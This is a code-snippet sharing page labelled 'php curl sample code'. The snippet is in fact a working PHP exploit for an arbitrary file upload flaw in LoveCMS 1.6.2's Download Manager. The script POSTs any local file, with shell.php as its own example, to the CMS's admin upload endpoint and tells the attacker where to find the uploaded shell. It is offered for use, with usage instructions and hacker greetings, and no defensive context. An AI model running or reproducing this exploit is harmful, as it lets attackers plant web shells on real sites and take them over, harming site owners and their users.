Advanced Search

php curl sample code

/ Published in: PHP
Save to your folder(s)

Expand | Embed | Plain Text

Copy this code and paste it in your HTML 
  1. <?php
  2.  
  3. /**
  4. * LoveCMS 1.6.2 Final (Download Manager v1.0) Arbitrary File Upload Exploit
  5. * Discovered && Exploited by cOndemned
  6. *
  7. * Download:
  8. *	http://www.thethinkingman.net/modules/download_manager/?id=16
  9. *
  10. * Description:
  11. *	This exploit allows attacker to upload any type of file [no extension
  12. *	filtration] ex. php shell... 
  13. *
  14. *	Uploader is adding random number on the begining of file name so user
  15. *	have to check it manually.
  16. *
  17. *	for more information check /modules/download_manager/admin/index.php
  18. *	lines 10 - 27.
  19. *
  20. * Greetz:
  21. *	ZaBeaTy, str0ke, Necro, doctor, sid.psycho, 0in, TBH & Avantura...
  22. *
  23. */
  24.  
  25. 	if($argc != 3)
  26. 	{
  27. 		printf("\n[~] Usage: php %s <target> <localfile>\n", $argv[0]);
  28. 		printf("[~] Ex.: php %s localhost/lovecms shell.php\n\n", $argv[0]);
  29. 		exit;	
  30. 	}
  31.  
  32. 	list($script, $target, $file) = $argv;
  33.  
  34. 	$xpl = curl_init();
  35.  
  36. 	curl_setopt($xpl, CURLOPT_URL, $target . '/modules/download_manager/admin/index.php');
  37. 	curl_setopt($xpl, CURLOPT_RETURNTRANSFER, true);
  38. 	curl_setopt($xpl, CURLOPT_POST, true);
  39. 	curl_setopt($xpl, CURLOPT_POSTFIELDS, array('file' => '@' . $file, 'submit' => 'Upload'));
  40.  
  41. 	curl_exec($xpl);
  42. 	curl_close($xpl);
  43.  
  44. 	printf("[!] Go to the %s/uploads/ and check U'r file :)\n\n", $target);
  45.  
  46. ?>

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.